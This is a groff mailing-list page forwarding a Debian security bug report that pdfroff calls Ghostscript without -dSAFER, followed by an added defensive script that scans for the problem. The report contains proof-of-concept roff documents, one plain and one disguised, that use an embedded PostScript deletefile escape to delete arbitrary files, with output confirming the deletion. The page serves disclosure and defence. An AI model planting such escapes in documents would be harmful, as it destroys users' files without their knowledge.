bug-groff

address@hidden: Bug#538338: groff: pdfroff invokes gs insecurely (withou


From: Colin Watson
Subject: address@hidden: Bug#538338: groff: pdfroff invokes gs insecurely (without -dSAFER)]
Date: Tue, 11 Aug 2009 09:51:21 -0000
User-agent: Mutt/1.5.18 (2008-05-17)

groff uses -dSAFER elsewhere (pre-html.cpp); is there any reason not to
do so here?

Thanks,

-- 
Colin Watson                                       address@hidden
--- Begin Message ---
Subject: Bug#538338: groff: pdfroff invokes gs insecurely (without -dSAFER)
Date: Fri, 24 Jul 2009 22:17:15 +0000
User-agent: Mutt/1.5.20 (2009-06-14)
Package: groff
Version: 1.20.1-4
Severity: grave
File: /usr/bin/pdfroff
Tags: security

pdfroff invokes gs without -dSAFER, leading to the ability to write,
rename, and delete arbitrary files:

  lakeview ok % cat attack.roff
  I am an evil attacking document.  Boo!
  \X'ps: exec (/tmp/remove-me) deletefile'
  lakeview ok % touch /tmp/remove-me && pdfroff attack.roff >/dev/null && [ ! -f "/tmp/remove-me" ] && echo removed
  GPL Ghostscript SVN PRE-RELEASE 8.64: Unrecoverable error, exit code 1
  removed

Using ps2pdf may be a better solution, since it uses -dSAFER
automatically.

Obviously, this is a fairly straightforward example, but in a document
the size of groff's -me manual, this could easily be hidden.  Disguising
it is easy, such as in:

  lakeview ok % cat attack.roff
  I am an evil attacking document.  Boo!
  .ds df deletefile
  .ds fn /tmp/remove-me
  \X'ps: exec (\*(fn) \*(df'

Processing or viewing a document from an unknown source shouldn't by
default cause code from that document to be executed, in general.

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/zsh4

Versions of packages groff depends on:
ii  groff-base                    1.20.1-4   GNU troff text-formatting system (
ii  libc6                         2.9-21     GNU C Library: Shared libraries
ii  libgcc1                       1:4.4.1-1  GCC support library
ii  libice6                       2:1.0.5-1  X11 Inter-Client Exchange library
ii  libsm6                        2:1.1.0-2  X11 Session Management library
ii  libstdc++6                    4.4.1-1    The GNU Standard C++ Library v3
ii  libx11-6                      2:1.2.2-1  X11 client-side library
ii  libxaw7                       2:1.0.5-2  X11 Athena Widget library
ii  libxmu6                       2:1.0.4-1  X11 miscellaneous utility library
ii  libxt6                        1:1.0.5-3  X11 toolkit intrinsics library

Versions of packages groff recommends:
ii  ghostscript                8.64~dfsg-13  The GPL Ghostscript PostScript/PDF
ii  imagemagick                7:6.5.1.0-1.1 image manipulation programs
ii  libpaper1                  1.1.23+nmu1   library for handling paper charact
ii  netpbm                     2:10.0-12     Graphics conversion tools
ii  psutils                    1.17-26       A collection of PostScript documen

groff suggests no packages.

-- no debconf information

-- 
brian m. carlson / brian with sandals: Houston, Texas, US
+1 713 440 7475 | http://crustytoothpaste.ath.cx/~bmc | My opinion only
OpenPGP: RSA v4 4096b 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187



--- End Message ---
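The two defensive checks the report implies, as an added example that is not part of either message and not groff's or pdfroff's own code: a pre-flight scan that flags any `\X'ps:` PostScript pass-through in a roff document (the string-disguised variant above still carries that literal prefix), and a helper that emits a Ghostscript PDF-conversion command line with `-dSAFER` kept on. The sample documents are constructed here; the function names and the temporary-directory layout are assumptions of this example.

```sh
#!/bin/sh
# Added example; not from the bug report or the groff project.

# Count \X'ps: ...' device-control requests in a roff file. Each one hands raw
# PostScript to gs, which is the channel the report abuses. Prints 0 when the
# file is unreadable or has no such escapes.
count_ps_escapes() {
    n=$(grep -c "\\\\X'ps:" "$1" 2>/dev/null) || true
    echo "${n:-0}"
}

# Return 0 if the file is free of PostScript pass-through, 1 otherwise.
scan_roff() {
    n=$(count_ps_escapes "$1")
    if [ "$n" -gt 0 ]; then
        echo "$1: $n PostScript pass-through escape(s); refuse it or run gs with -dSAFER" >&2
        return 1
    fi
    return 0
}

# Print, one argument per line, a gs invocation that converts PostScript to
# PDF with -dSAFER, which denies deletefile/renamefile and arbitrary writes.
# $1 = input .ps, $2 = output .pdf (paths are assumptions of this example).
gs_pdf_args() {
    printf '%s\n' gs -q -dSAFER -dBATCH -dNOPAUSE -sDEVICE=pdfwrite \
        "-sOutputFile=$2" "$1"
}

# Constructed samples: one clean page, one using the disguised form from the report.
make_samples() {
    cat > "$1/clean.roff" <<'EOF'
.TH CLEAN 1
An ordinary page with no PostScript pass-through.
EOF
    cat > "$1/suspect.roff" <<'EOF'
I am an evil attacking document.  Boo!
.ds df deletefile
.ds fn /tmp/remove-me
\X'ps: exec (\*(fn) \*(df'
EOF
}

dir=$(mktemp -d)
make_samples "$dir"
for f in "$dir"/*.roff; do
    scan_roff "$f" || :
done
gs_pdf_args "$dir/input.ps" "$dir/output.pdf"
rm -rf "$dir"
```

Ghostscript 9.50 and later enable SAFER by default, but passing the flag explicitly still protects older installs such as the 8.64 in the report.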
